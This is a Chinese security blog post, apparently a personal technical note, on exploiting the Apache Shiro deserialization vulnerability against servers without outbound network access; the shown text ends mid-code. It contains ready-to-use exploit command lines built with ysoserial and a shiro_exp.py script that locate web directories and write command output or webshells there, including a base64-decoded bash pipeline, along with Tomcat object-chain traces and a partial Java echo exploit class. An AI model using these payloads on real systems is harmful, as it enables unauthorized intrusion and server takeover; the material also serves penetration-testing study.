<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="0x1 前言在做红蓝对抗、攻防演练时经常会发现Shiro反序列化漏洞，在进行漏洞攻击时利用难度取决于服务器是否可以出网。在可以出网的情况下一般都能很快获取权限，在不能出网时就比较麻烦了。碰到一些比较艰难的环境也用过一些很笨的方法去解决，虽然过程时间比较长，效率慢，但最终成功的拿下目标权限时的成就感是不言而喻的。 最近大家讨论得比较火的Java反序列化的回显和内存webshell使得很多Java反序">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro反序列化漏洞笔记四（实战篇）">
<meta property="og:url" content="http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/index.html">
<meta property="og:site_name" content="长夏">
<meta property="og:description" content="0x1 前言在做红蓝对抗、攻防演练时经常会发现Shiro反序列化漏洞，在进行漏洞攻击时利用难度取决于服务器是否可以出网。在可以出网的情况下一般都能很快获取权限，在不能出网时就比较麻烦了。碰到一些比较艰难的环境也用过一些很笨的方法去解决，虽然过程时间比较长，效率慢，但最终成功的拿下目标权限时的成就感是不言而喻的。 最近大家讨论得比较火的Java反序列化的回显和内存webshell使得很多Java反序">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/1.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/2.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/3.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/4.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/5.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/6.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/7.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/8.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/9.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/10.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/11.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/12.png">
<meta property="article:published_time" content="2020-12-26T21:21:19.000Z">
<meta property="article:modified_time" content="2022-04-28T09:07:15.321Z">
<meta property="article:author" content="长夏">
<meta property="article:tag" content="JAVA反序列化漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Shiro反序列化漏洞笔记四（实战篇）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="长夏" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2021/01/23/%E5%86%8D%E8%A7%81%EF%BC%8C2020/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/10/03/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%B8%89%EF%BC%88%E8%A7%A3%E7%96%91%E7%AF%87%EF%BC%89/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&text=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&is_video=false&description=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞笔记四（实战篇）&body=Check out this article: http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&name=Shiro反序列化漏洞笔记四（实战篇）&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&t=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-前言"><span class="toc-number">1.</span> <span class="toc-text">0x1 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-解决方法"><span class="toc-number">2.</span> <span class="toc-text">0x2 解决方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-定位Web目录写入文件"><span class="toc-number">2.1.</span> <span class="toc-text">1.定位Web目录写入文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-构造回显"><span class="toc-number">2.2.</span> <span class="toc-text">2.构造回显</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-写入无文件webshell"><span class="toc-number">2.3.</span> <span class="toc-text">3.写入无文件webshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-时间延迟获取Web路径写入webshell"><span class="toc-number">2.4.</span> <span class="toc-text">4.时间延迟获取Web路径写入webshell</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Shiro反序列化漏洞笔记四（实战篇）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">长夏</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-12-26T21:21:19.000Z" itemprop="datePublished">2020-12-26</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%8A%80%E6%9C%AF/">技术</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="tag">JAVA反序列化漏洞</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="0x1-前言"><a href="#0x1-前言" class="headerlink" title="0x1 前言"></a>0x1 前言</h2><p>在做红蓝对抗、攻防演练时经常会发现Shiro反序列化漏洞，在进行漏洞攻击时利用难度取决于服务器是否可以出网。在可以出网的情况下一般都能很快获取权限，在不能出网时就比较麻烦了。碰到一些比较艰难的环境也用过一些很笨的方法去解决，虽然过程时间比较长，效率慢，但最终成功的拿下目标权限时的成就感是不言而喻的。</p>
<p>最近大家讨论得比较火的Java反序列化的回显和内存webshell使得很多Java反序列化漏洞在利用过程中遇到的难题引刃而解。看了大佬们各种思路方法，真是八仙过海，各显神通。</p>
<p>这篇笔记主要记录一下Shiro反序列化漏洞实战时遇到不出网环境的解决思路，也顺便总结学习一下大佬们的一些方法。</p>
<h2 id="0x2-解决方法"><a href="#0x2-解决方法" class="headerlink" title="0x2 解决方法"></a>0x2 解决方法</h2><h3 id="1-定位Web目录写入文件"><a href="#1-定位Web目录写入文件" class="headerlink" title="1.定位Web目录写入文件"></a>1.定位Web目录写入文件</h3><p>这种方法之前在<a href="http://changxia3.com/2020/07/06/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">命令执行漏洞总结</a>这篇笔记提过，但在实际运用时还需要考虑一些问题。</p>
<p>因为这种办法还是依赖于执行命令来解决问题，因此要区分操作系统，需要考虑Linux和Windows操作系统下命令的差异。</p>
<p>首先可以先寻找一个存在的静态资源文件,然后搜索静态资源文件定位Web目录，再借助管道符来往Web目录写入执行命令的结果或者直接写入webshell。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Linux:</span><br><span class="line">find &#x2F;|grep check.js|while read f;do sh -c &quot;whoami&quot; &gt;$(dirname $f)&#x2F;test.txt;done</span><br><span class="line"></span><br><span class="line">Windows:</span><br><span class="line">for &#x2F;r D:\ %i in (check.js*) do whoami &gt; %i&#x2F;..&#x2F;test.txt</span><br></pre></td></tr></table></figure>
<p>但是直接将上面的命令传入ysoserial的command参数生成payload是不成功的，因为ysoserial在构造命令执行时使用的是java.lang.Runtime.getRuntime().exec(command)，这种命令执行方式和在直接在shell里面执行是不一样的，这种方式不支持重定向符&gt;。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">String cmd &#x3D; &quot;java.lang.Runtime.getRuntime().exec(\&quot;&quot; +</span><br><span class="line">            command.replaceAll(&quot;\\\\&quot;,&quot;\\\\\\\\&quot;).replaceAll(&quot;\&quot;&quot;, &quot;\\\&quot;&quot;) +</span><br><span class="line">            &quot;\&quot;);&quot;;</span><br></pre></td></tr></table></figure>
<p>对于这个问题是比较容易解决的，如果目标操作系统是Linux可以使用$@使得Runtime.getRuntime().exec(command)支持重定向符。如使用以下方式生成Shiro反序列化漏洞利用的Exp执行whoami命令并往Web目录写入命令执行的结果。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python shiro_exp.py &#96;java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsBeanutils1 &#39;sh -c $@|sh . echo find &#x2F;|grep style.css|while read f;do sh -c whoami&gt;$(dirname $f)&#x2F;test.txt;done&#39;|base64&#96;</span><br></pre></td></tr></table></figure>
<p><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/1.png" alt=""></p>
<p>也可以使用base64编码来解决，先将命令进行base64编码然后替换下面的base64_string部分。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python shiro_exp.py &#96;java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsBeanutils1 &#39;bash -c &#123;echo,base64_string&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#39;|base64&#96;</span><br></pre></td></tr></table></figure>
<p><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/2.png" alt=""></p>
<p>然而上面两种方法并不能解决Windows的问题，其实只需要对ysoserial进行简单修改，使得传入java.lang.Runtime.getRuntime().exec()的参数为数组形式即可，最终传入命令变成了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java.lang.Runtime.getRuntime().exec(new java.lang.String[]&#123;&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-c&quot;,&quot;find &#x2F; | grep style.css | while read f;do sh -c whoami &gt;$(dirname $f)&#x2F;test.txt;done&quot;&#125;);</span><br></pre></td></tr></table></figure>
<p><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/3.png" alt=""></p>
<h3 id="2-构造回显"><a href="#2-构造回显" class="headerlink" title="2.构造回显"></a>2.构造回显</h3><p>很多大佬在网上分享了各种构造回显的方法，这里简单总结一下：<br>•<a href="https://xz.aliyun.com/t/7307" target="_blank" rel="noopener">《linux下java反序列化通杀回显方法的低配版实现》</a>，思路很奇特，通过获取socket对应的文件描述符，把命令结果写到文件描述符中获得回显，但是局限性比较大。<br>•<a href="https://xz.aliyun.com/t/7348" target="_blank" rel="noopener">《Tomcat中一种半通用回显方法》</a>，通过反射修改ApplicationDispatcher.WRAP_SAME_OBJECT，将修改后的Request和Response记录到ThreadLocal中。<br>•<a href="https://xz.aliyun.com/t/7535" target="_blank" rel="noopener">《tomcat不出网回显连续剧第六集》</a>，从register寻找Request。<br>•<a href="https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651374294&idx=3&sn=82d050ca7268bdb7bcf7ff7ff293d7b3" target="_blank" rel="noopener">《基于全局储存的新思路 | Tomcat的一种通用回显方法研究》</a>，通过WebappClassLoader寻找Request和Response，但是这种方法不支持Tomcat7，因为在Tomcat7中通过Thread.currentThread.getContextClassLoader()无法获取到StandardService。<br>•<a href="https://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/" target="_blank" rel="noopener">《半自动化挖掘request实现多种中间件回显》</a>，c0ny1大佬写的半自动化工具java-object-searcher，通过线程对象搜索Request，通过这个工具可以挖掘各种中间件的回显利用链。<br>•<a href="https://blog.csdn.net/fnmsd/article/details/106709736" target="_blank" rel="noopener">《基于请求/响应对象搜索的Java中间件通用回显方法（针对HTTP）》</a>，通过线程对象搜索HttpServletRequest和HttpServletResponse，和c0ny1大佬的思路差不多，这个可以自动化实现多个中间件通用，不用自己再去寻找回显利用链。实际运用中可能也会遇到一些问题，大佬也来回改了好几版。</p>
<p>这里就用java-object-searcher来学习一下Tomcat的回显方法吧。本地搭了Tomcat 7.0.106、8.5.56、9.0.19三个环境，搜索Request对象结果如下：<br>Tomcat 7.0.106：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">TargetObject &#x3D; &#123;org.apache.tomcat.util.threads.TaskThread&#125;</span><br><span class="line">  ---&gt; group &#x3D; &#123;java.lang.ThreadGroup&#125;</span><br><span class="line">   ---&gt; threads &#x3D; &#123;class [Ljava.lang.Thread;&#125;</span><br><span class="line">    ---&gt; [12] &#x3D; &#123;java.lang.Thread&#125;</span><br><span class="line">     ---&gt; target &#x3D; &#123;org.apache.tomcat.util.net.JIoEndpoint$Acceptor&#125;</span><br><span class="line">      ---&gt; this$0 &#x3D; &#123;org.apache.tomcat.util.net.JIoEndpoint&#125;</span><br><span class="line">       ---&gt; handler &#x3D; &#123;org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler&#125;</span><br><span class="line">        ---&gt; global &#x3D; &#123;org.apache.coyote.RequestGroupInfo&#125;</span><br><span class="line">         ---&gt; processors &#x3D; &#123;java.util.ArrayList&lt;org.apache.coyote.RequestInfo&gt;&#125;</span><br><span class="line">          ---&gt; [0] &#x3D; &#123;org.apache.coyote.RequestInfo&#125;</span><br></pre></td></tr></table></figure>
<p>Tomcat 8.5.56：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">TargetObject &#x3D; &#123;org.apache.tomcat.util.threads.TaskThread&#125;</span><br><span class="line">  ---&gt; group &#x3D; &#123;java.lang.ThreadGroup&#125;</span><br><span class="line">   ---&gt; threads &#x3D; &#123;class [Ljava.lang.Thread;&#125;</span><br><span class="line">    ---&gt; [14] &#x3D; &#123;java.lang.Thread&#125;</span><br><span class="line">     ---&gt; target &#x3D; &#123;org.apache.tomcat.util.net.NioEndpoint$Poller&#125;</span><br><span class="line">      ---&gt; this$0 &#x3D; &#123;org.apache.tomcat.util.net.NioEndpoint&#125;</span><br><span class="line">         ---&gt; handler &#x3D; &#123;org.apache.coyote.AbstractProtocol$ConnectionHandler&#125;</span><br><span class="line">          ---&gt; global &#x3D; &#123;org.apache.coyote.RequestGroupInfo&#125;</span><br><span class="line">           ---&gt; processors &#x3D; &#123;java.util.ArrayList&lt;org.apache.coyote.RequestInfo&gt;&#125;</span><br><span class="line">            ---&gt; [0] &#x3D; &#123;org.apache.coyote.RequestInfo&#125;</span><br></pre></td></tr></table></figure>
<p>Tomcat 9.0.19</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">TargetObject &#x3D; &#123;org.apache.tomcat.util.threads.TaskThread&#125;</span><br><span class="line">  ---&gt; group &#x3D; &#123;java.lang.ThreadGroup&#125;</span><br><span class="line">   ---&gt; threads &#x3D; &#123;class [Ljava.lang.Thread;&#125;</span><br><span class="line">    ---&gt; [17] &#x3D; &#123;java.lang.Thread&#125;</span><br><span class="line">     ---&gt; target &#x3D; &#123;org.apache.tomcat.util.net.NioEndpoint$Poller&#125;</span><br><span class="line">      ---&gt; this$0 &#x3D; &#123;org.apache.tomcat.util.net.NioEndpoint&#125;</span><br><span class="line">         ---&gt; handler &#x3D; &#123;org.apache.coyote.AbstractProtocol$ConnectionHandler&#125;</span><br><span class="line">          ---&gt; global &#x3D; &#123;org.apache.coyote.RequestGroupInfo&#125;</span><br><span class="line">           ---&gt; processors &#x3D; &#123;java.util.List&lt;org.apache.coyote.RequestInfo&gt;&#125;</span><br><span class="line">            ---&gt; [0] &#x3D; &#123;org.apache.coyote.RequestInfo&#125;</span><br></pre></td></tr></table></figure>
<p>从得到的结果看，Tomcat 8.5.56和Tomcat 9.0.19的结果基本是一样的，不同的地方可能就在于可寻找到Request的线程名，Tomcat 7.0.106虽然不一样，差异也不是很大，但是这三个结果不能完全代表Tomcat 7,8,9，具体到某一些版本的实现上面也是有差异的。</p>
<p>这里先以Tomcat 7.0.106为例，参照c0ny1大佬的思路构造一下回显EXP。先根据Tomcat 7.0.106的搜索结果，动态调试一下。</p>
<p>http-bio-8090-Acceptor-0和http-bio-8090-AsyncTimeout这两个线程都能找到Request。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/4.png" alt=""></p>
<p><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/5.png" alt=""></p>
<p>最终回显EXP：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line">import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line">import com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line">import org.apache.tomcat.util.buf.ByteChunk;</span><br><span class="line">import java.lang.reflect.Field;</span><br><span class="line">import java.util.ArrayList;</span><br><span class="line">import java.io.*;</span><br><span class="line">import org.apache.coyote.Request;</span><br><span class="line"></span><br><span class="line">public class Tomcat7Echo extends AbstractTranslet &#123;</span><br><span class="line">    public Tomcat7Echo()&#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            ThreadGroup group &#x3D; Thread.currentThread().getThreadGroup();</span><br><span class="line">            Field field &#x3D; group.getClass().getDeclaredField(&quot;threads&quot;);</span><br><span class="line">            field.setAccessible(true);</span><br><span class="line"></span><br><span class="line">            Thread[] threads &#x3D; (Thread[]) field.get(group);</span><br><span class="line"></span><br><span class="line">            for(Thread thread:threads)&#123;</span><br><span class="line">                String name &#x3D; thread.getName();</span><br><span class="line">                if(name.contains(&quot;http&quot;) &amp;&amp; name.contains(&quot;Acceptor&quot;))&#123;</span><br><span class="line">                    field &#x3D; thread.getClass().getDeclaredField(&quot;target&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    Object obj &#x3D; field.get(thread);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;this$0&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;handler&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getSuperclass().getDeclaredField(&quot;global&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;processors&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    ArrayList processors &#x3D; (ArrayList) obj;</span><br><span class="line"></span><br><span class="line">                    for(int m&#x3D;0;m&lt;processors.size();m++)&#123;</span><br><span class="line">                        Object o &#x3D; processors.get(m);</span><br><span class="line">                        if(o !&#x3D; null &amp;&amp; o.getClass().toString().contains(&quot;RequestInfo&quot;))&#123;</span><br><span class="line">                            field &#x3D; 